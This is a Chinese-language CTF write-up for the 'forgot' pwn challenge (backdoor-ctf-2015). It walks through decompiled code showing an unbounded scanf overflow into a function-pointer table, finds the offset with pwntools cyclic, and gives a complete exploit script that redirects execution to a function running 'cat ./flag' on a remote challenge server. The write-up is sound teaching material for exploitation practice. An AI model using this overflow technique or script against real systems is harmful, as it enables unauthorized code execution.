CTF – PWN – forgot

题目说明

题目来源: backdoor-ctf-2015

题目: forgot

解题步骤

查看文件类型和保护机制:开启了NX,因此不考虑注入Shellcode

root@kali:~# file forgot 
forgot: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=35930a2d9b048236694e9611073b759e1c88b8c4, stripped

root@kali:~# checksec forgot
[*] '/root/forgot'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

使用IDA32查看主函数

/* Decompiled main() of the `forgot` binary (IDA output, identifiers kept as-is).
 * Reads a name with a bounded fgets(), then an "email" with an unbounded
 * scanf("%s") into the 32-byte buffer v2, runs a small validation automaton
 * over it and finally makes an indirect call through the function-pointer
 * table v3..v12, which sits directly above v2 on the stack (v2 at esp+10h,
 * v3 at esp+30h). */
int __cdecl main()
{
size_t v0; // ebx
char v2[32]; // [esp+10h] [ebp-74h]  -- target of the unbounded scanf() below
int (*v3)(); // [esp+30h] [ebp-54h]  -- first entry of the 10-entry handler table
int (*v4)(); // [esp+34h] [ebp-50h]
int (*v5)(); // [esp+38h] [ebp-4Ch]
int (*v6)(); // [esp+3Ch] [ebp-48h]
int (*v7)(); // [esp+40h] [ebp-44h]
int (*v8)(); // [esp+44h] [ebp-40h]
int (*v9)(); // [esp+48h] [ebp-3Ch]
int (*v10)(); // [esp+4Ch] [ebp-38h]
int (*v11)(); // [esp+50h] [ebp-34h]
int (*v12)(); // [esp+54h] [ebp-30h]  -- last table entry
char s; // [esp+58h] [ebp-2Ch]  -- shown as one char; the 32 bytes up to v14 are its real extent
int v14; // [esp+78h] [ebp-Ch]  -- automaton state (1..10); also selects the handler at the end
size_t i; // [esp+7Ch] [ebp-8h]

v14 = 1;
/* Handler table: one function pointer per automaton state, filled with
 * hard-coded .text addresses (the binary is non-PIE, see checksec). */
v3 = sub_8048604;
v4 = sub_8048618;
v5 = sub_804862C;
v6 = sub_8048640;
v7 = sub_8048654;
v8 = sub_8048668;
v9 = sub_804867C;
v10 = sub_8048690;
v11 = sub_80486A4;
v12 = sub_80486B8;
puts("What is your name?");
printf("> ");
fflush(stdout);
fgets(&s, 32, stdin); /* bounded read: at most 31 characters plus NUL */
sub_80485DD((int)&s); /* body not shown; presumably prints the "Hi <name>" banner seen in the transcript */
fflush(stdout);
/* Prints a code address (8048654 in the transcript); harmless here since
 * the binary has no PIE, but it is an information leak all the same. */
printf("I should give you a pointer perhaps. Here: %x\n\n", sub_8048654);
fflush(stdout);
puts("Enter the string to be validate");
printf("> ");
fflush(stdout);
/* No field width: any input longer than 31 bytes overruns v2 and walks
 * into the handler table above it. This is the bug the writeup exploits. */
__isoc99_scanf("%s", v2);
/* Email-validation automaton: advance v14 by one state per matching character. */
for ( i = 0; ; ++i )
{
v0 = i;
if ( v0 >= strlen(v2) ) /* strlen() re-evaluated on every iteration */
break;
switch ( v14 )
{
case 1:
if ( sub_8048702(v2[i]) ) /* character-class check; body not shown */
v14 = 2;
break;
case 2:
if ( v2[i] == 64 ) /* '@' */
v14 = 3;
break;
case 3:
if ( sub_804874C(v2[i]) ) /* character-class check; body not shown */
v14 = 4;
break;
case 4:
if ( v2[i] == 46 ) /* '.' */
v14 = 5;
break;
case 5:
if ( sub_8048784(v2[i]) ) /* same check for the four states after the dot; body not shown */
v14 = 6;
break;
case 6:
if ( sub_8048784(v2[i]) )
v14 = 7;
break;
case 7:
if ( sub_8048784(v2[i]) )
v14 = 8;
break;
case 8:
if ( sub_8048784(v2[i]) )
v14 = 9;
break;
case 9:
v14 = 10; /* terminal state; remaining characters fall into default */
break;
default:
continue;
}
}
/* Dispatch: decrement the final state in place and use it as an index into
 * the table starting at v3. Once the overflow above has overwritten that
 * table, this call goes wherever the overwritten entry points. */
(*(&v3 + --v14))();
return fflush(stdout);
}

同时在函数列表中找到了获取flag的函数

/* Decompiled "win" function: builds the shell command "cat ./flag" in a
 * 50-byte (0x32) stack buffer and hands it to system(). Returns system()'s
 * status. Never reachable through the normal automaton table. */
int sub_80486CC()
{
char cmd[0x32];

snprintf(cmd, sizeof cmd, "cat %s", "./flag");
return system(cmd);
}

所以只需要覆盖EIP,就能获得flag。先使用pwntools的cyclic()构造一个长度为100的字符串,用来确定偏移

>>> from pwn import *
>>> cyclic(100)
'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'

在gdb中输入字符串后查看EIP的值

(gdb) info registers eip
eip 0x61617261 0x61617261

由于寄存器中的值是十六进制,并且按小端序(字节倒序)存放,所以写个脚本把它恢复成原始字符串

# Turn the hex EIP value gdb printed into the ASCII bytes it was built from.
# The register holds the bytes little-endian, so the two-character byte
# groups are reversed before decoding (0x61617261 -> 'araa').
char = '61617261'
char_list = [char[pos:pos + 2] for pos in range(0, len(char), 2)][::-1]
text = ''.join(chr(int(byte_hex, 16)) for byte_hex in char_list)
print(text)

运行得到araa,用cyclic_find寻找位置,到EIP的偏移为63

>>> cyclic_find('araa')-4
63

编写exp

# Exploit script for the `forgot` challenge (pwntools).
from pwn import *

p = remote('111.198.29.45','50785')

# Drain whatever the service has printed so far. recv() returns as soon as
# any data is available, so this does not guarantee the whole banner was read;
# it works here because the payload is sent as one line regardless.
p.recv()
# 63 filler bytes followed by the address of sub_80486CC (the cat-flag
# function) as a 32-bit little-endian value; 63 is the offset found with
# cyclic_find above.
payload = 'A'*63 + p32(0x080486cc)

# One line serves both prompts: the first 31 bytes appear to be consumed by the
# fgets() name prompt ("Hi AAAA..." in the transcript), the rest overruns the
# 32-byte scanf() buffer and the function-pointer table behind it.
p.sendline(payload)
p.interactive()

运行得到flag

root@kali:~# python exp.py 
[+] Opening connection to 111.198.29.45 on port 50785: Done
[*] Switching to interactive mode

Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Finite-State Automaton

I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address

Cheers!

I should give you a pointer perhaps. Here: 8048654

Enter the string to be validate
> cyberpeace{a454211e63e1e59977d045f3d593de0f}